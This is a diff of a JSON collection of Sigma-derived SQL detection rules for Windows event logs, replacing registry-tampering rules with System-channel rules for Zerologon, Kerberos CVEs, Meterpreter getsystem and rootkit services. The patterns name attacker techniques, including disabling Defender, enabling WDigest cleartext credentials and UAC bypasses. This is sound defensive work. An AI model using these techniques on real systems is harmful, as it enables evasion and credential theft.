"Office Security Settings Changed", - "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", - "status": "experimental", - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", - "author": "Trent Liffick (@tliffick)", + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "status": "test", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "author": "Dimitrios Slamaris, @atc_project (fix)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ - "Valid Macros and/or internal documents" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_set_office_security.yml" + "filename": "win_system_susp_dhcp_config_failed.yml" }, { - "title": "Bypass UAC Using SilentCleanup Task", - "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "title": "QuarksPwDump Clearing Access History", + "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "status": "test", - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", - "author": "frack113", + "description": "Detects QuarksPwDump clearing access history in hive", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND NewValue LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" }, { - "title": "Disable Tamper Protection on Windows Defender", - "id": "93d298a1-d28f-47f1-a468-d971e7796679", + "title": "NTLMv1 Logon Between Client and Server", + "id": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", "status": "experimental", - "description": "Detects disabling Windows Defender Tamper Protection", - "author": "Austin Songer @austinsonger", + "description": "Detects the reporting of NTLMv1 being used between a client and server", + "author": "Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1550.002", + "attack.s0363" ], "falsepositives": [ - "Unknown" + "Environments that use NTLMv1" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'LsaSrv' AND EventID = '6038')" ], - "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml" + "filename": "win_system_lsasrv_ntlmv1.yml" }, { - "title": "Disabled Windows Defender Eventlog", - "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", - "status": "experimental", - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CVE-2021-42278 Exploitation Attempt", + "id": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", + "status": "test", + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Kerberos-Key-Distribution-Center' AND EventID IN ('35', '36', '37', '38'))" ], - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" + "filename": "win_system_exploit_cve_2021_42278.yml" }, { - "title": "Disable Internal Tools or Feature in Registry", - "id": "e2482f8d-3443-4237-b906-cc145d87a076", - "status": "experimental", - "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", - "author": "frack113, Nasreddine Bencherchali", + "title": "Potential CVE-2021-42287 Exploitation Attempt", + "id": "e80a0fee-1a62-4419-b31e-0d0db6e6013a", + "status": "test", + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Legitimate admin script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskmgr' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Explorer\\\\DisableNotificationCenter' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\StartMenuLogOff' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Storage\\\\Write Protection' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\StorageDevicePolicies\\\\WriteProtect' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Directory-Services-SAM' AND EventID IN ('16990', '16991'))" + ], + "filename": "win_system_exploit_cve_2021_42287.yml" + }, + { + "title": "Zerologon Exploitation Using Well-known Tools", + "id": "18f37338-b9bd-4117-a039-280c81f7a596", + "status": "stable", + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", + "tags": [ + "attack.t1210", + "attack.lateral_movement" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" ], - "filename": "registry_set_disable_function_user.yml" + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" }, { - "title": "DHCP Callout DLL Installation", - "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "title": "Vulnerable Netlogon Secure Channel Connection Allowed", + "id": "a0cb7110-edf0-47a4-9177-541a4083128a", "status": "test", - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "author": "Dimitrios Slamaris", + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "author": "NVISO", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" ], - "filename": "registry_set_dhcp_calloutdll.yml" + "filename": "win_system_vul_cve_2020_1472.yml" }, { - "title": "CobaltStrike Service Installations in Registry", - "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "author": "Wojciech Lesicki", + "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "status": "experimental", + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((NewValue LIKE '%ADMIN$%' ESCAPE '\\' AND NewValue LIKE '%.exe%' ESCAPE '\\') OR (NewValue LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND NewValue LIKE '%start%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" ], - "filename": "registry_set_cobaltstrike_service_installs.yml" + "filename": "win_system_kdcsvc_rc4_downgrade.yml" }, { - "title": "Wdigest Enable UseLogonCredential", - "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "title": "Volume Shadow Copy Mount", + "id": "f512acbf-e662-4903-843e-97ce4652b740", "status": "test", - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects volume shadow copy mount via windows event log", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of volume shadow copy mounts (backups maybe)." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Ntfs' AND EventID = '98' AND DeviceName LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "registry_set_wdigest_enable_uselogoncredential.yml" + "filename": "win_system_volume_shadow_copy_mount.yml" }, { - "title": "VBScript Payload Stored in Registry", - "id": "46490193-1b22-4c29-bdd6-5bf63907216f", - "status": "experimental", - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "title": "NTFS Vulnerability Exploitation", + "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", + "status": "test", + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.impact", + "attack.t1499.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (NewValue LIKE '%vbscript:%' ESCAPE '\\' OR NewValue LIKE '%jscript:%' ESCAPE '\\' OR NewValue LIKE '%mshtml,%' ESCAPE '\\' OR NewValue LIKE '%RunHTMLApplication%' ESCAPE '\\' OR NewValue LIKE '%Execute(%' ESCAPE '\\' OR NewValue LIKE '%CreateObject%' ESCAPE '\\' OR NewValue LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR NewValue LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" ], - "filename": "registry_set_vbs_payload_stored.yml" + "filename": "win_system_ntfs_vuln_exploit.yml" }, { - "title": "Disable Microsoft Office Security Features", - "id": "7c637634-c95d-4bbf-b26c-a82510874b34", + "title": "Windows Update Error", + "id": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", "status": "test", - "description": "Disable Microsoft Office Security Features by registry", + "description": "Windows Update get some error Check if need a 0-days KB", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.resource_development", + "attack.t1584" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-WindowsUpdateClient' AND EventID IN ('16', '20', '24', '213', '217'))" ], - "filename": "registry_set_disable_microsoft_office_security_features.yml" + "filename": "win_system_susp_system_update_error.yml" }, { - "title": "Modification of IE Registry Settings", - "id": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", + "title": "Local Privilege Escalation Indicator TabTip", + "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", "status": "experimental", - "description": "Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence", - "author": "frack113", + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings%' ESCAPE '\\') AND NOT ((NewValue LIKE 'DWORD%' ESCAPE '\\') OR (NewValue IN ('Cookie:', 'Visited:', '(Empty)')) OR ((TargetObject LIKE '%\\\\Cache%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ZoneMap%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WpadDecision%' ESCAPE '\\')) OR (NewValue = 'Binary Data') OR (TargetObject LIKE '%\\\\Accepted Documents\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-DistributedCOM' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" ], - "filename": "registry_set_persistence_ie.yml" + "filename": "win_system_lpe_indicators_tabtip.yml" }, { - "title": "Disable Security Events Logging Adding Reg Key MiniNt", - "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", - "status": "test", - "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Service Installed By Unusual Client - System", + "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "status": "experimental", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" ], - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + "filename": "win_system_system_service_installation_by_unusal_client.yml" }, { - "title": "PrinterNightmare Mimimkatz Driver Name", - "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", - "status": "test", - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "author": "Markus Neis, @markus_neis, Florian Roth", + "title": "Moriya Rootkit - System", + "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "status": "experimental", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" ], - "filename": "registry_event_mimikatz_printernightmare.yml" + "filename": "win_system_moriya_rootkit.yml" }, { - "title": "DLL Load via LSASS", - "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", - "status": "test", - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Installation in Suspicious Folder", + "id": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "status": "experimental", + "description": "Detects service installation in suspicious folder appdata", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", "attack.persistence", - "attack.t1547.008" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\127.0.0.1%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\localhost%' ESCAPE '\\')) AND NOT ((ServiceName = 'Zoom Sharing Service' AND ImagePath LIKE '\"C:\\\\Program Files\\\\Common Files\\\\Zoom\\\\Support\\\\CptService.exe%' ESCAPE '\\')))" ], - "filename": "registry_event_susp_lsass_dll_load.yml" + "filename": "win_system_susp_service_installation_folder.yml" }, { - "title": "Run Once Task Configuration in Registry", - "id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", - "status": "test", - "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", - "author": "Avneet Singh @v3t0_, oscd.community", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "status": "experimental", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Legitimate modification of the registry key by legitimate program" + "Highly unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' AND TargetObject LIKE '%\\\\StubPath' ESCAPE '\\') AND NOT ((NewValue LIKE '\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\Installer\\\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level%' ESCAPE '\\') OR ((NewValue LIKE '\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' OR NewValue LIKE '\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\') AND NewValue LIKE '%\\\\Installer\\\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" ], - "filename": "registry_event_runonce_persistence.yml" + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" }, { - "title": "Shell Open Registry Keys Manipulation", - "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", - "status": "test", - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation STDIN+ Launcher - System", + "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE 